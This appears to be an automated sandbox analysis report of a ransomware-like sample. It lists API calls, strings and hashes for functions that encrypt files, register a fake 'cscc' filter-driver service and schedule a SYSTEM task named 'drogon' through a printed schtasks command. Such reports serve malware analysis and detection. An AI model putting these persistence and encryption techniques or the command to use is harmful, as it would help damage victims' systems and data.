                                              control_flow_graph 507 4bf1eb9-4bf1ee2 GetProcessHeap HeapAlloc 508 4bf204b-4bf2051 507->508 509 4bf1ee8-4bf1eeb 507->509 510 4bf1eee-4bf1ef3 509->510 510->510 511 4bf1ef5-4bf1efd 510->511 512 4bf1f00-4bf1f05 511->512 512->512 513 4bf1f07-4bf1f28 GetProcessHeap HeapAlloc 512->513 514 4bf1f2e-4bf1f77 htons 513->514 515 4bf2038-4bf204a GetProcessHeap HeapFree 513->515 516 4bf1f79-4bf1f81 514->516 515->508 516->516 517 4bf1f83-4bf1f85 516->517 518 4bf1f88-4bf1f8d 517->518 518->518 519 4bf1f8f-4bf1f9b 518->519 520 4bf1f9e-4bf1fa3 519->520 520->520 521 4bf1fa5-4bf1fae 520->521 522 4bf1fb0-4bf1fb8 521->522 522->522 523 4bf1fba-4bf1fbc 522->523 524 4bf1fbf-4bf1fc4 523->524 524->524 525 4bf1fc6-4bf1fcd 524->525 526 4bf1fd0-4bf1fd5 525->526 526->526 527 4bf1fd7-4bf1ff9 send 526->527 528 4bf1ffb-4bf2010 recv 527->528 529 4bf2028-4bf2032 GetProcessHeap HeapFree 527->529 528->529 530 4bf2012-4bf2015 528->530 529->515 530->529 531 4bf2017-4bf2024 530->531 531->529
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04BF943A), ref: 04BF1ED2
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1EDB
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04BF943A), ref: 04BF1F1F
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF1F22
                                              • htons.WS2_32(?), ref: 04BF1F41
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF1FF1
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF2008
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04BF943A), ref: 04BF202B
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2032
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04BF943A), ref: 04BF203D
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04BF943A), ref: 04BF2044
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                              • String ID: ?????
                                              • API String ID: 1780562090-2358547729
                                              • Opcode ID: 19d36b6ac6ed299f839e9919c1744ef9266a86c0d379c06ae2badec2d5041b5c
                                              • Instruction ID: 0f62a0cc0a153410939f3bb8d707d14afdd284c2c2ab3497d572b7ccb7ed384c
                                              • Opcode Fuzzy Hash: 19d36b6ac6ed299f839e9919c1744ef9266a86c0d379c06ae2badec2d5041b5c
                                              • Instruction Fuzzy Hash: 3D5104369002469FDB118F7CDC58AAA7BF9EF49300B0585D5ED89DB251DB35E809C7A0
                                              Function 04BF5D0A Relevance: 19.7, APIs: 13, Instructions: 152fileencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 04BF5D2A
                                              • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 04BF5D46
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 04BF5D60
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BF5D8D
                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 04BF5DBC
                                              • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 04BF5DFD
                                              • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 04BF5E1A
                                              • FlushViewOfFile.KERNEL32(?,?), ref: 04BF5E2C
                                              • UnmapViewOfFile.KERNEL32(?), ref: 04BF5E35
                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,?,?,?,00000010,?), ref: 04BF5E54
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04BF5E71
                                              • CryptDestroyKey.ADVAPI32(?), ref: 04BF5E7F
                                              • SetEvent.KERNEL32(?), ref: 04BF5E92
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$CryptView$ChangeCloseCreateFindNotification$DestroyDuplicateEncryptEventFlushMappingSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 2349520537-0
                                              • Opcode ID: 74c2c06a89cfcec7e20e8925efe263b8073345b60e896a44e5b23ee87c3eb5ba
                                              • Instruction ID: c462f80c7bc839785c5ebb9e1e152b35737ce4c5ec73bf1240ac36e84d17445a
                                              • Opcode Fuzzy Hash: 74c2c06a89cfcec7e20e8925efe263b8073345b60e896a44e5b23ee87c3eb5ba
                                              • Instruction Fuzzy Hash: DE517A72900219BBEF219FA1DC48EEFBF79FF08750F004066FA09A2151D775AA54DBA0
                                              Function 04BF8313 Relevance: 19.6, APIs: 13, Instructions: 99memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04BF832A
                                              • LoadResource.KERNEL32(00000000), ref: 04BF8341
                                              • LockResource.KERNEL32(00000000), ref: 04BF8350
                                              • SizeofResource.KERNEL32(00000000), ref: 04BF8368
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04BF8384
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04BF838D
                                              • memcpy.MSVCRT ref: 04BF839C
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04BF83B9
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF83BC
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 04BF83FE
                                              • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 04BF8401
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04BF840A
                                              • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF840D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                              • String ID:
                                              • API String ID: 3010137425-0
                                              • Opcode ID: 748466963b3b31000b9ff2b4271a28e3e301d5c288f92675681a0fb3c179bee7
                                              • Instruction ID: 92951815a5656c0378e9315e98369c6c53b401516cb7de227c26d2f8019b4efc
                                              • Opcode Fuzzy Hash: 748466963b3b31000b9ff2b4271a28e3e301d5c288f92675681a0fb3c179bee7
                                              • Instruction Fuzzy Hash: D8315075900205ABDB16AFA9DC48FAA7FA8EF49350F004055FA19D7290DB34EA14DB60
                                              Function 04BF5A73 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 132fileencryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,04BF5DE8,00000000,?,?,?,00000010,?), ref: 04BF5A92
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BF5AC3
                                              • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5AEA
                                              • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B32
                                              • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B49
                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B5F
                                              • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B77
                                              • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5B99
                                              • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5BA2
                                              • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5BB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: encrypted
                                              • API String ID: 569730286-1467498611
                                              • Opcode ID: 6ddf1a9a1b3cba6932323e484d58140f363c8550522019c141fc29095c100542
                                              • Instruction ID: f5d1665934d40f776b1368868c0654bd536ccdc4a7d16af43eaa01e8c02eae5d
                                              • Opcode Fuzzy Hash: 6ddf1a9a1b3cba6932323e484d58140f363c8550522019c141fc29095c100542
                                              • Instruction Fuzzy Hash: 7E416DB2610209BFEB148F74DD44AAA7BA9EB44354F058069FE09E7241DB71EE15CBA0
                                              Function 04BF1368 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 51serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF1377
                                              • GetLastError.KERNEL32(?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF1383
                                              • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,04BF154F), ref: 04BF13B6
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF13DB
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,04BF154F,00000000,04BF11D0,?,?,?), ref: 04BF13DE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                              • String ID: Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                              • API String ID: 2226085316-2908389127
                                              • Opcode ID: fc572001eb8b7714751d978a7c6cad4c92f2359e9dd6ddb8c059940e621c9f8b
                                              • Instruction ID: 896b8edbc47f9cfd594e3e84ce1fc3af9d1275e56bfa9917b2a4bacee942f591
                                              • Opcode Fuzzy Hash: fc572001eb8b7714751d978a7c6cad4c92f2359e9dd6ddb8c059940e621c9f8b
                                              • Instruction Fuzzy Hash: 4C016235782324FBC7215BBAAC4DD9FBE6DDB05BA1B014862F60EA3540D9F46D01DAB0
                                              Function 04BF1531 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,04BF11D0,?,?,?), ref: 04BF1588
                                              Strings
                                              • cscc, xrefs: 04BF153A
                                              • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 04BF1578
                                              • DumpFilters, xrefs: 04BF1592
                                              • LowerFilters, xrefs: 04BF155E
                                              • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 04BF1597
                                              • UpperFilters, xrefs: 04BF1573
                                              • cscc, xrefs: 04BF1533
                                              • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 04BF1563
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Version
                                              • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
                                              • API String ID: 1889659487-625840244
                                              • Opcode ID: 4d54b2fabcdc67bb19ab594764d4fd358e7b633e05b430f7596a24528c425ec0
                                              • Instruction ID: f36f534c25c8a09212f30bfd296b39c42ac9a7e46e19dc2333d0b71f2fb3fad2
                                              • Opcode Fuzzy Hash: 4d54b2fabcdc67bb19ab594764d4fd358e7b633e05b430f7596a24528c425ec0
                                              • Instruction Fuzzy Hash: F8F05421E82722A71BA576EDBC0171940929E0095830749E1EE4AA7141EA50FF08C7A1
                                              Function 04BF6299 Relevance: 15.1, APIs: 10, Instructions: 81encryptionsynchronizationthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04BF62A5
                                              • LocalFree.KERNEL32(?), ref: 04BF635D
                                                • Part of subcall function 04BF5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04BF62C3,?), ref: 04BF5520
                                                • Part of subcall function 04BF5507: GetLastError.KERNEL32(?,04BF62C3,?), ref: 04BF5528
                                                • Part of subcall function 04BF5507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04BF62C3,?), ref: 04BF553E
                                              • CloseHandle.KERNEL32(?,?), ref: 04BF6348
                                                • Part of subcall function 04BF5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5636
                                                • Part of subcall function 04BF5613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04BF564C
                                                • Part of subcall function 04BF5613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5662
                                                • Part of subcall function 04BF5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF5682
                                                • Part of subcall function 04BF5613: LocalAlloc.KERNEL32(00000040,?), ref: 04BF568D
                                                • Part of subcall function 04BF5613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF56A6
                                                • Part of subcall function 04BF5613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04BF56B5
                                                • Part of subcall function 04BF5613: LocalFree.KERNEL32(00000000), ref: 04BF56BF
                                                • Part of subcall function 04BF5613: LocalFree.KERNEL32(?), ref: 04BF56C8
                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 04BF633F
                                                • Part of subcall function 04BF6085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60A6
                                                • Part of subcall function 04BF6085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60BA
                                                • Part of subcall function 04BF6085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60D3
                                                • Part of subcall function 04BF6085: CryptDestroyHash.ADVAPI32(?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60DF
                                              • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04BF6336
                                                • Part of subcall function 04BF6246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6260
                                                • Part of subcall function 04BF6246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6273
                                                • Part of subcall function 04BF6246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6289
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000060F9,?,00000000,00000000), ref: 04BF62F7
                                                • Part of subcall function 04BF5E9F: PathCombineW.SHLWAPI(?,?,04C01554,?,?), ref: 04BF5EC8
                                                • Part of subcall function 04BF5E9F: FindFirstFileW.KERNELBASE(?,?), ref: 04BF5EE3
                                                • Part of subcall function 04BF5E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04BF5F09
                                                • Part of subcall function 04BF5E9F: PathCombineW.SHLWAPI(?,?,?), ref: 04BF5FB1
                                                • Part of subcall function 04BF5E9F: StrStrIW.SHLWAPI(?,04C03014), ref: 04BF5FE9
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 04BF6312
                                              • CloseHandle.KERNEL32(00000000), ref: 04BF6319
                                              • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 04BF6322
                                              • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04BF632D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Hash$Local$CreateDestroy$ContextFreeObject$AcquireAllocBinaryCloseCombineDataDecodeHandlePathStringWait$DeriveErrorEventFileFindFirstImportInfoLastMultipleObjectsParamPublicReleaseSingleThread
                                              • String ID:
                                              • API String ID: 2692407486-0
                                              • Opcode ID: 141c0ed1b8b70e9b2ea3482d08ca88f381fe1d656ce116f56b2ec4360dec1385
                                              • Instruction ID: 7b0266595542a044e2dc7e8406185763716829d7f4359136c5d8dbaf9aa8c6aa
                                              • Opcode Fuzzy Hash: 141c0ed1b8b70e9b2ea3482d08ca88f381fe1d656ce116f56b2ec4360dec1385
                                              • Instruction Fuzzy Hash: 31212F71100605BFFB216BB4ED88DAB7BADEF08355B04046AFF4B82461DB65FC568A70
                                              Function 04BF5613 Relevance: 13.6, APIs: 9, Instructions: 87encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5636
                                              • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04BF564C
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04BF5662
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF5682
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04BF568D
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04BF56A6
                                              • CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04BF56B5
                                              • LocalFree.KERNEL32(00000000), ref: 04BF56BF
                                              • LocalFree.KERNEL32(?), ref: 04BF56C8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                              • String ID:
                                              • API String ID: 3940947887-0
                                              • Opcode ID: 807b9890a25485de0c0eca33aaf76bf1b71dbd0b131e2aa3d882748538901b77
                                              • Instruction ID: b7115582fcc96dab1a498d40f3c317ece085cb71d22b82219348d8e8d6d19063
                                              • Opcode Fuzzy Hash: 807b9890a25485de0c0eca33aaf76bf1b71dbd0b131e2aa3d882748538901b77
                                              • Instruction Fuzzy Hash: 5F215C72501218BADF219FA29C48EDFBF7DEF097A0F008051FA1DA6090D6719A14DBB0
                                              Function 04BF5E9F Relevance: 12.2, APIs: 8, Instructions: 151fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PathCombineW.SHLWAPI(?,?,04C01554,?,?), ref: 04BF5EC8
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 04BF5EE3
                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04BF5F09
                                              • PathCombineW.SHLWAPI(?,?,?), ref: 04BF5FB1
                                              • StrStrIW.SHLWAPI(?,04C03014), ref: 04BF5FE9
                                              • PathFindExtensionW.SHLWAPI(?), ref: 04BF601B
                                              • FindNextFileW.KERNELBASE(?,?), ref: 04BF6065
                                              • FindClose.KERNELBASE(?), ref: 04BF6077
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                              • String ID:
                                              • API String ID: 1251538951-0
                                              • Opcode ID: b7144853294ce2da0c5eef0bcc9c6b6f40bf292f238cab9e0e9a9c2741fba234
                                              • Instruction ID: ef3fce9ed6c05bc725c5291f69e4da068398588b849c22ee2d02d6e9a3078695
                                              • Opcode Fuzzy Hash: b7144853294ce2da0c5eef0bcc9c6b6f40bf292f238cab9e0e9a9c2741fba234
                                              • Instruction Fuzzy Hash: 8451D472104245AFDB31DF34CC849AAB3A9EB80714F644B9AFE5AC7094E732E94EC751
                                              Function 04BF8192 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?,00000000), ref: 04BF81AF
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF81F2
                                              • PathAppendW.SHLWAPI(?,?), ref: 04BF82AF
                                              • wsprintfW.USER32 ref: 04BF82CE
                                                • Part of subcall function 04BF7FB7: wsprintfW.USER32 ref: 04BF7FD6
                                                • Part of subcall function 04BF7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                                • Part of subcall function 04BF7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                                • Part of subcall function 04BF7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                                • Part of subcall function 04BF7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                                • Part of subcall function 04BF7FB7: Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              Strings
                                              • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 04BF82C8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                              • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                              • API String ID: 2586884543-3727968613
                                              • Opcode ID: 96e2d5593e988aafa862b2bcfa2747a4f3201e369a7a8b223758be41eeb4e337
                                              • Instruction ID: d8ccab8c4b5bb1fc7bdd55b5201ce9c74e6ef7f50b88e74d6c9e56b13b3bbc89
                                              • Opcode Fuzzy Hash: 96e2d5593e988aafa862b2bcfa2747a4f3201e369a7a8b223758be41eeb4e337
                                              • Instruction Fuzzy Hash: 9441D622A58348A9EB10DBE4EC16BFE7375EF44B10F10545BE604FB1D0E7B55A84C369
